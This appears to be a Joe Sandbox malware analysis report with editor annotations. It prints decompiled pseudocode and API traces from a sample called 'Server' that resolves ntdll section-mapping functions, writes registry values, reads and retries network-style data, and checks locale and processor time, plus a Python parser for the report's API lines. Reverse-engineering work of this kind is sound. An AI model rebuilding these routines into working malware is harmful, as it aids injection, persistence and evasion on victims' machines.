            				intOrPtr _t39;
            				_Unknown_base(*)()* _t41;
            				intOrPtr _t44;
            				struct HINSTANCE__* _t48;
            				intOrPtr _t54;
            
            				_t54 = E020233DC(0x20);
            				if(_t54 == 0) {
            					_v8 = 8;
            				} else {
            					_t23 =  *0x202a348; // 0xc7d5a8
            					_t1 = _t23 + 0x202b436; // 0x4c44544e
            					_t48 = GetModuleHandleA(_t1);
            					_t26 =  *0x202a348; // 0xc7d5a8
            					_t2 = _t26 + 0x202b85c; // 0x7243775a
            					_v8 = 0x7f;
            					_t28 = GetProcAddress(_t48, _t2);
            					 *(_t54 + 0xc) = _t28;
            					if(_t28 == 0) {
            						L8:
            						E020261DA(_t54);
            					} else {
            						_t30 =  *0x202a348; // 0xc7d5a8
            						_t5 = _t30 + 0x202b849; // 0x614d775a
            						_t32 = GetProcAddress(_t48, _t5);
            						 *(_t54 + 0x10) = _t32;
            						if(_t32 == 0) {
            							goto L8;
            						} else {
            							_t33 =  *0x202a348; // 0xc7d5a8
            							_t7 = _t33 + 0x202b72b; // 0x6e55775a
            							_t35 = GetProcAddress(_t48, _t7);
            							 *(_t54 + 0x14) = _t35;
            							if(_t35 == 0) {
            								goto L8;
            							} else {
            								_t36 =  *0x202a348; // 0xc7d5a8
            								_t9 = _t36 + 0x202b883; // 0x4e6c7452
            								_t38 = GetProcAddress(_t48, _t9);
            								 *(_t54 + 0x18) = _t38;
            								if(_t38 == 0) {
            									goto L8;
            								} else {
            									_t39 =  *0x202a348; // 0xc7d5a8
            									_t11 = _t39 + 0x202b87b; // 0x6c43775a
            									_t41 = GetProcAddress(_t48, _t11);
            									 *(_t54 + 0x1c) = _t41;
            									if(_t41 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t54 + 4)) = _a4;
            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
            										_t44 = E02027A08(_t54, _a8);
            										_v8 = _t44;
            										if(_t44 != 0) {
            											goto L8;
            										} else {
            											 *_a12 = _t54;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}

            APIs
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,020237FB,?,?,?,?,00000000,00000000), ref: 02026C1E
            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02026C40
            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02026C56
            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02026C6C
            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02026C82
            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02026C98
              • Part of subcall function 02027A08: memset.NTDLL ref: 02027A87
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AddressProc$AllocateHandleHeapModulememset
            • String ID:
            • API String ID: 1886625739-0
            • Opcode ID: 8aeccbf6013de3d0f901d341bc1cb0249bd28deb3779e4f187bcd44cd0a4d77d
            • Instruction ID: 5f9181a5d9ff932546103d3819e9855e101c87bbbd39fdd42682153e0d0fe231
            • Opcode Fuzzy Hash: 8aeccbf6013de3d0f901d341bc1cb0249bd28deb3779e4f187bcd44cd0a4d77d
            • Instruction Fuzzy Hash: E72124B060071A9FD721EF6ACA84E6A77ECEB043047265827E509C7211EB74D60CDF60
            Uniqueness

            Uniqueness Score: -1.00%
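
            Added example, not part of the Joe Sandbox report or of the sample: a parser for the "APIs" bullet lines in this report format, with a decoder for the pointer arguments. As elsewhere in the report, a pointer argument is printed as the first four bytes of the data it points at, read as a little-endian DWORD, so 4C44544E is "NTDL" and 7243775A is "ZwCr". The regular expression, the ApiCall record and the helper names are the editor's; the sample text is the API list of the function above, copied verbatim. The full export names are not in the report and the code does not guess them.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Sample input: the eight "APIs" bullet lines of the function at 0x02026C1E,
# copied from the report (bullets and indentation kept as printed).
SAMPLE_API_LIST = """\
  • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
• GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,020237FB,?,?,?,?,00000000,00000000), ref: 02026C1E
• GetProcAddress.KERNEL32(00000000,7243775A), ref: 02026C40
• GetProcAddress.KERNEL32(00000000,614D775A), ref: 02026C56
• GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02026C6C
• GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02026C82
• GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02026C98
  • Part of subcall function 02027A08: memset.NTDLL ref: 02027A87
"""

# One bullet line: optional "Part of subcall function XXXXXXXX:" prefix,
# "Name.MODULE", an optional "(arg,arg,...)" list and the "ref: XXXXXXXX" call site.
API_LINE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function\s+(?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_#]*)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Argument token or pseudocode comment value: up to eight hex digits, optional 0x.
HEX_TOKEN = re.compile(r"(?:0x)?([0-9A-Fa-f]{1,8})$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                      # address of the call instruction
    args: List[str]               # argument tokens as printed ("?" = unknown)
    caller: Optional[int] = None  # set for "Part of subcall function" lines
    decoded: Dict[int, str] = field(default_factory=dict)  # arg index -> text


def _printable(b: int) -> bool:
    return 0x20 <= b < 0x7F


def decode_dword(token: str) -> Optional[str]:
    """Read a hex DWORD as the first four bytes of the string it points at.

    Returns a four-character ASCII prefix, a two-character UTF-16LE prefix
    (e.g. 76006f -> "ov"), or None when the bytes are not all printable.
    """
    m = HEX_TOKEN.match(token.strip())
    if m is None:
        return None
    raw = int(m.group(1), 16).to_bytes(4, "little")
    if all(_printable(b) for b in raw):
        return raw.decode("ascii")
    if raw[1] == 0 and raw[3] == 0 and _printable(raw[0]) and _printable(raw[2]):
        return raw.decode("utf-16-le")
    return None


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if m is None:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    call = ApiCall(
        name=m["name"], module=m["module"], ref=int(m["ref"], 16), args=args,
        caller=int(m["caller"], 16) if m["caller"] else None,
    )
    for i, a in enumerate(args):
        text = decode_dword(a)
        if text is not None:
            call.decoded[i] = text
    return call


def parse_api_list(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]


def resolved_import_prefixes(calls: List[ApiCall]) -> List[str]:
    """Name prefixes handed to GetProcAddress, in call order: the visible part
    of what the loader resolves at run time (full names are not in the report)."""
    return [c.decoded[1] for c in calls if c.name == "GetProcAddress" and 1 in c.decoded]


if __name__ == "__main__":
    calls = parse_api_list(SAMPLE_API_LIST)
    for call in calls:
        print(f"{call.ref:08X} {call.module}!{call.name} {call.decoded}")
    print("GetProcAddress prefixes:", resolved_import_prefixes(calls))
```

            Four printable bytes can occur by chance in a non-pointer argument (4D283A53 from the lstrlen line further down decodes to "S:(M"), so treat a decoded prefix as a hint to confirm against the pseudocode, not as proof of a string pointer. Running the block prints each call with its decoded arguments and the five GetProcAddress prefixes ZwCr, ZwMa, ZwUn, RtlN and ZwCl, the ntdll exports this routine resolves by name.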

            C-Code - Quality: 88%
            			E02024C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
            				signed int _v8;
            				char _v12;
            				signed int* _v16;
            				char _v284;
            				void* __esi;
            				char* _t59;
            				intOrPtr* _t60;
            				intOrPtr _t64;
            				char _t65;
            				intOrPtr _t68;
            				intOrPtr _t69;
            				intOrPtr _t71;
            				void* _t73;
            				signed int _t81;
            				void* _t91;
            				void* _t92;
            				char _t98;
            				signed int* _t100;
            				intOrPtr* _t101;
            				void* _t102;
            
            				_t92 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t98 = _a16;
            				if(_t98 == 0) {
            					__imp__( &_v284,  *0x202a3dc); // lstrcpy (APIs: ref 02024D16) of the string both branches use as the key path
            					_t91 = 0x80000002; // HKEY_LOCAL_MACHINE
            					L6:
            					_t59 = E02026536( &_v284,  &_v284); // per its subcalls (lstrlen, mbstowcs, memset): heap copy of the path as a wide string, NULL on allocation failure
            					_a8 = _t59;
            					if(_t59 == 0) {
            						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
            						L29:
            						_t60 = _a20;
            						if(_t60 != 0) {
            							 *_t60 =  *_t60 + 1;
            						}
            						return _v8;
            					}
            					_t101 = _a24;
            					if(E0202313F(_t92, _t97, _t101, _t91, _t59) != 0) {
            						L27:
            						E020261DA(_a8);
            						goto L29;
            					}
            					_t64 =  *0x202a318; // 0x2ca9e18
            					_t16 = _t64 + 0xc; // 0x2ca9f3a
            					_t65 = E02026536(_t64,  *_t16);
            					_a24 = _t65;
            					if(_t65 == 0) {
            						L14:
            						_t29 = _t101 + 0x14; // 0x102
            						_t33 = _t101 + 0x10; // 0x3d020290
            						if(E02027767(_t97,  *_t33, _t91, _a8,  *0x202a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
            							_t68 =  *0x202a348; // 0xc7d5a8
            							if(_t98 == 0) {
            								_t35 = _t68 + 0x202bb5a; // 0x4d4c4b48 = "HKLM"
            								_t69 = _t35;
            							} else {
            								_t34 = _t68 + 0x202bbac; // 0x55434b48 = "HKCU"
            								_t69 = _t34;
            							}
            							if(E02027238(_t69,  *0x202a3d4,  *0x202a3d8,  &_a24,  &_a16) == 0) {
            								if(_t98 == 0) {
            									_t71 =  *0x202a348; // 0xc7d5a8
            									_t44 = _t71 + 0x202b332; // 0x74666f53 = "Soft", first four bytes of the string
            									_t73 = E02026536(_t44, _t44);
            									_t99 = _t73;
            									if(_t73 == 0) {
            										_v8 = 8;
            									} else {
            										_t47 = _t101 + 0x10; // 0x3d020290
            										E02025B0E( *_t47, _t91, _a8,  *0x202a3d8, _a24);
            										_t49 = _t101 + 0x10; // 0x3d020290
            										E02025B0E( *_t49, _t91, _t99,  *0x202a3d0, _a16);
            										E020261DA(_t99);
            									}
            								} else {
            									_t40 = _t101 + 0x10; // 0x3d020290
            									E02025B0E( *_t40, _t91, _a8,  *0x202a3d8, _a24);
            									_t43 = _t101 + 0x10; // 0x3d020290
            									E02025B0E( *_t43, _t91, _a8,  *0x202a3d0, _a16);
            								}
            								if( *_t101 != 0) {
            									E020261DA(_a24);
            								} else {
            									 *_t101 = _a16;
            								}
            							}
            						}
            						goto L27;
            					}
            					_t21 = _t101 + 0x10; // 0x3d020290
            					_t81 = E020258BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
            					if(_t81 == 0) {
            						_t100 = _v16;
            						if(_v12 == 0x28) { // existing value is exactly 40 bytes
            							 *_t100 =  *_t100 & _t81; // _t81 is 0 here: clear the value's first DWORD, then write all 40 bytes back
            							_t26 = _t101 + 0x10; // 0x3d020290
            							E02027767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
            						}
            						E020261DA(_t100);
            						_t98 = _a16;
            					}
            					E020261DA(_a24);
            					goto L14;
            				}
            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) { // 0x104 = MAX_PATH, 0x5f = '_': reject a name of 8 characters or fewer, one that would not fit the path buffer, or one containing '_'
            					goto L29;
            				} else {
            					_t97 = _a8;
            					E02027AB0(_t98, _a8,  &_v284);
            					__imp__(_t102 + _t98 - 0x117,  *0x202a3dc); // lstrcpy (APIs: ref 02024CF4): the same string, written after the copied name
            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c; // '\\' between the name and the string, so the buffer reads <name>\<string>
            					_t91 = 0x80000003; // HKEY_USERS
            					goto L6;
            				}
            			}

            (instruction-address gutter for E02024C94: one address per pseudocode line of the side-by-side view, flattened by extraction; the body spans 0x02024c94 to 0x02024eb4, with 0x00000000 on the goto lines)

            APIs
            • StrChrA.SHLWAPI(02026A76,0000005F,00000000,00000000,00000104), ref: 02024CC7
            • lstrcpy.KERNEL32(?,?), ref: 02024CF4
              • Part of subcall function 02026536: lstrlen.KERNEL32(?,00000000,02CA9E18,00000000,02026F0A,02CAA03B,43175AC3,?,?,?,?,43175AC3,00000005,0202A00C,4D283A53,?), ref: 0202653D
              • Part of subcall function 02026536: mbstowcs.NTDLL ref: 02026566
              • Part of subcall function 02026536: memset.NTDLL ref: 02026578
              • Part of subcall function 02025B0E: lstrlenW.KERNEL32(?,?,?,02024E5D,3D020290,80000002,02026A76,020257D1,74666F53,4D4C4B48,020257D1,?,3D020290,80000002,02026A76,?), ref: 02025B33
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • lstrcpy.KERNEL32(?,00000000), ref: 02024D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
            • String ID: ($\
            • API String ID: 3924217599-1512714803
            • Opcode ID: a8a3ae706d721f295665ab9da411c37c95c2accb5c43d5af3894172a1d48fdda
            • Instruction ID: b998d3ce825704ce02e88e9c501026dd9454336c6130302baac990ff2e6b37fd
            • Opcode Fuzzy Hash: a8a3ae706d721f295665ab9da411c37c95c2accb5c43d5af3894172a1d48fdda
            • Instruction Fuzzy Hash: 97513772500329EFDF229F60DD80EEA7BBAFF08354F108916F91196160DB35E929AF10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E0202454F(void* __eax, void* __ecx) {
            				char _v8;
            				void* _v12;
            				intOrPtr _v16;
            				char _v20;
            				void* __esi;
            				intOrPtr _t36;
            				intOrPtr* _t37;
            				intOrPtr* _t39;
            				void* _t53;
            				long _t58;
            				void* _t59;
            
            				_t53 = __ecx;
            				_t59 = __eax;
            				_t58 = 0;
            				ResetEvent( *(__eax + 0x1c));
            				_push( &_v8);
            				_push(4);
            				_push( &_v20);
            				_push( *((intOrPtr*)(_t59 + 0x18)));
            				if( *0x202a160() != 0) { // call through a resolved import pointer with (handle at +0x18, &_v20, 4, &bytesRead); a failure with GetLastError() == 0x3e5 (ERROR_IO_PENDING) is treated below as an asynchronous completion
            					L5:
            					if(_v8 == 0) {
            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
            						L21:
            						return _t58;
            					}
            					 *0x202a174(0, 1,  &_v12); // second resolved import: (NULL, TRUE, &object) is the CreateStreamOnHGlobal signature, and the object is used below through vtable slots 2 (Release) and 4 (IStream::Write); editor's reading, not confirmed by the report
            					if(0 != 0) { // decompiler artifact: the HRESULT test was folded into a constant, the real branch is at 0x020245c7
            						_t58 = 8;
            						goto L21;
            					}
            					_t36 = E020233DC(0x1000);
            					_v16 = _t36;
            					if(_t36 == 0) {
            						_t58 = 8;
            						L18:
            						_t37 = _v12;
            						 *((intOrPtr*)( *_t37 + 8))(_t37); // vtable slot 2: Release
            						goto L21;
            					}
            					_push(0);
            					_push(_v8);
            					_push( &_v20);
            					while(1) {
            						_t39 = _v12;
            						_t56 =  *_t39;
            						 *((intOrPtr*)( *_t39 + 0x10))(_t39); // vtable slot 4 with the pushed (buffer, length, NULL): IStream::Write if _v12 is an IStream
            						ResetEvent( *(_t59 + 0x1c));
            						_push( &_v8);
            						_push(0x1000);
            						_push(_v16);
            						_push( *((intOrPtr*)(_t59 + 0x18)));
            						if( *0x202a160() != 0) {
            							goto L13;
            						}
            						_t58 = GetLastError();
            						if(_t58 != 0x3e5) { // ERROR_IO_PENDING: wait on the event at +0x1c (E020216B2 with INFINITE, WaitForMultipleObjects per its subcall) and abort if the flag at +0x28 is set
            							L15:
            							E020261DA(_v16);
            							if(_t58 == 0) {
            								_t58 = E02022B18(_v12, _t59);
            							}
            							goto L18;
            						}
            						_t58 = E020216B2( *(_t59 + 0x1c), _t56, 0xffffffff);
            						if(_t58 != 0) {
            							goto L15;
            						}
            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
            						if(_t58 != 0) {
            							goto L15;
            						}
            						L13:
            						_t58 = 0;
            						if(_v8 == 0) {
            							goto L15;
            						}
            						_push(0);
            						_push(_v8);
            						_push(_v16);
            					}
            				}
            				_t58 = GetLastError();
            				if(_t58 != 0x3e5) { // ERROR_IO_PENDING on the first 4-byte read: same wait-and-check as in the loop
            					L4:
            					if(_t58 != 0) {
            						goto L21;
            					}
            					goto L5;
            				}
            				_t58 = E020216B2( *(_t59 + 0x1c), _t53, 0xffffffff);
            				if(_t58 != 0) {
            					goto L21;
            				}
            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
            				goto L4;
            			}

            (instruction-address gutter for E0202454F: one address per pseudocode line of the side-by-side view, flattened by extraction; the body spans 0x0202454f to 0x0202467e, with 0x00000000 on the goto lines)

            APIs
            • ResetEvent.KERNEL32(?), ref: 02024565
            • GetLastError.KERNEL32 ref: 0202457E
              • Part of subcall function 020216B2: WaitForMultipleObjects.KERNEL32(00000002,02027C47,00000000,02027C47,?,?,?,02027C47,0000EA60), ref: 020216CD
            • ResetEvent.KERNEL32(?), ref: 020245F7
            • GetLastError.KERNEL32 ref: 02024612
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ErrorEventLastReset$MultipleObjectsWait
            • String ID: @MetNet
            • API String ID: 2394032930-2109406137
            • Opcode ID: 6b6730611aaecd0fabfb85fd5b867284cafd78d70e12e17e3e5e4e2d6118b2c9
            • Instruction ID: 672e159261fc1a282202efdd79a4f0b851308ec5417796df357f90bcc1df206c
            • Opcode Fuzzy Hash: 6b6730611aaecd0fabfb85fd5b867284cafd78d70e12e17e3e5e4e2d6118b2c9
            • Instruction Fuzzy Hash: 9E31E632A40724AFCB229BA4CC48F6EB7F9FF84354F210516E555D7190DB30E909EB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E0202607C() {
            				void* _v0;
            				void** _t3;
            				void** _t5;
            				void** _t7;
            				void** _t8;
            				void* _t10;
            
            				_t3 =  *0x202a3cc; // 0x2ca9600
            				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection on the CRITICAL_SECTION at +0x40 of the global object (see APIs)
            				while(1) {
            					_t5 =  *0x202a3cc; // 0x2ca9600
            					_t1 =  &(_t5[0x16]); // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa); // wait until the DWORD at +0x58 reaches zero before swapping the buffer
            				}
            				_t7 =  *0x202a3cc; // 0x2ca9600
            				_t10 =  *_t7;
            				if(_t10 != 0 && _t10 != 0x202b142) { // free the old buffer unless it is the built-in default at 0x202b142, which lives in the image, not on the heap
            					HeapFree( *0x202a2d8, 0, _t10);
            					_t7 =  *0x202a3cc; // 0x2ca9600
            				}
            				 *_t7 = _v0;
            				_t8 =  &(_t7[0x10]);
            				__imp__(_t8); // RtlLeaveCriticalSection
            				return _t8;
            			}

            (instruction-address gutter for E0202607C: one address per pseudocode line of the side-by-side view, flattened by extraction; the body spans 0x0202607c to 0x020260d8, with 0x00000000 on the break lines)

            APIs
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02026085
            • Sleep.KERNEL32(0000000A), ref: 0202608F
            • HeapFree.KERNEL32(00000000), ref: 020260BD
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 020260D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: 6559e2a8c60c8de16957baee83bc6e9687fb97a85defadea5b1a7e1cfe17f291
            • Instruction ID: 80f6d2a843771d640b6f4e0424d6c285eff7d95d9ce1ee78d1ff15eb1c59332b
            • Opcode Fuzzy Hash: 6559e2a8c60c8de16957baee83bc6e9687fb97a85defadea5b1a7e1cfe17f291
            • Instruction Fuzzy Hash: 95F03A74B803159FE7288F54D9C9B1637F5BB44700F264907F806D73A0CB39A82CEA14
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,01FC167F,0000000A,?,?), ref: 01FC1824
            • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 01FC1884 (flProtect 4 = PAGE_READWRITE)
            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,01FC167F,0000000A), ref: 01FC18AF (access 6 = FILE_MAP_READ | FILE_MAP_WRITE; offset and size 0, i.e. the whole section)
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01FC167F,0000000A,?,?), ref: 01FC18D0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,01FC167F,0000000A,?,?), ref: 01FC18D8
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
            • String ID:
            • API String ID: 2685682793-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: 20e0f9426c227fb7bd0d8c8894f6c493cf92afbc8a128dc3c87992a5e0ac4fab
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 8B21F5B2E0810AFFE710EFA8CD84EAF3BADEB44791F104039FA01E7191D63189549B60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 01FC2052 (4 MiB initial size, maximum 0 = growable private heap)
            • GetModuleHandleA.KERNEL32(00000000), ref: 01FC2062
            • GetCommandLineW.KERNEL32 ref: 01FC206D
              • Part of subcall function 01FC1C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 01FC1C8D (class 8 = SystemProcessorPerformanceInformation, 0x30 = one 48-byte entry; read once and followed by Sleep, the shape of a processor idle-time probe, the second read is not shown here)
              • Part of subcall function 01FC1C58: Sleep.KERNEL32(00000000,00000030), ref: 01FC1CD4
              • Part of subcall function 01FC1C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 01FC1CFC (0x400 = LOCALE_USER_DEFAULT, 0x5A = LOCALE_SISO3166CTRYNAME: the two-letter ISO 3166 country code of the user locale, 4-byte buffer)
              • Part of subcall function 01FC1C58: GetSystemDefaultUILanguage.KERNEL32 ref: 01FC1D06
              • Part of subcall function 01FC1C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 01FC1D19
            • HeapDestroy.KERNEL32 ref: 01FC2080
            • ExitProcess.KERNEL32 ref: 01FC2087
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
            • String ID:
            • API String ID: 1393419808-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: e042452a08378d25bfe395b94bafe480bafd03bec894fa388cb0b544f1c396ae
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 23E0B6B0803621ABC3216F71BF0CA4E7E28BB59A527000535F605F2125CB394645DA9C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E020235D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
            				void* _v8;
            				char _v48;
            				void* __edi;
            				intOrPtr _t22;
            				intOrPtr _t30;
            				intOrPtr _t34;
            				intOrPtr* _t42;
            				void* _t43;
            				void* _t46;
            				intOrPtr* _t48;
            				void* _t49;
            				intOrPtr _t51;
            
            				_t42 = _a16;
            				_t48 = __eax;
            				_t22 =  *0x202a348; // 0xc7d5a8
            				_t2 = _t22 + 0x202b7bb; // 0x657a6973 = "size", start of the wsprintfA format string
            				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
            				if( *0x202a2ec >= 5) { // counter at *0x202a2ec: incremented on every failure (L9), reset on success below; from five failures on, E02023CE0 replaces the E02022B91 path
            					_t30 = E02023CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
            					L5:
            					_a4 = _t30;
            					L6:
            					if(_a4 != 0) {
            						L9:
            						 *0x202a2ec =  *0x202a2ec + 1;
            						L10:
            						return _a4;
            					}
            					_t50 = _a16;
            					 *_t48 = _a16;
            					_t49 = _v8;
            					 *_t42 = E020256B9(_t50, _t49);
            					_t34 = E020277A5(_t49, _t50);
            					if(_t34 != 0) {
            						 *_a8 = _t49;
            						 *_a12 = _t34;
            						if( *0x202a2ec < 5) {
            							 *0x202a2ec =  *0x202a2ec & 0x00000000;
            						}
            						goto L10;
            					}
            					_a4 = 0xbf; // 191 = ERROR_INVALID_EXE_SIGNATURE, returned when E020277A5 rejects the buffer; the allocation failure below returns 8 = ERROR_NOT_ENOUGH_MEMORY
            					E020263F6();
            					HeapFree( *0x202a2d8, 0, _t49);
            					goto L9;
            				}
            				_t51 =  *0x202a3e0; // 0x2ca9c20
            				if(RtlAllocateHeap( *0x202a2d8, 0, 0x800) == 0) {
            					_a4 = 8; // ERROR_NOT_ENOUGH_MEMORY
            					goto L6;
            				}
            				_t30 = E02022B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37); // _t37 is never assigned in this listing; it most likely carries the 0x800-byte buffer RtlAllocateHeap just returned (decompiler artifact)
            				goto L5;
            			}

            (instruction-address gutter for E020235D2: one address per pseudocode line of the side-by-side view, flattened by extraction; the body spans 0x020235d9 to 0x020236bc, with 0x00000000 on the goto lines)

            APIs
            • wsprintfA.USER32 ref: 020235F4
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02023619
              • Part of subcall function 02022B91: GetTickCount.KERNEL32 ref: 02022BA8
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022BF5
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C12
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C34
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C5B
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C7C
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022CA7
              • Part of subcall function 02022B91: HeapFree.KERNEL32(00000000,?), ref: 02022CBA
            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02023693
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
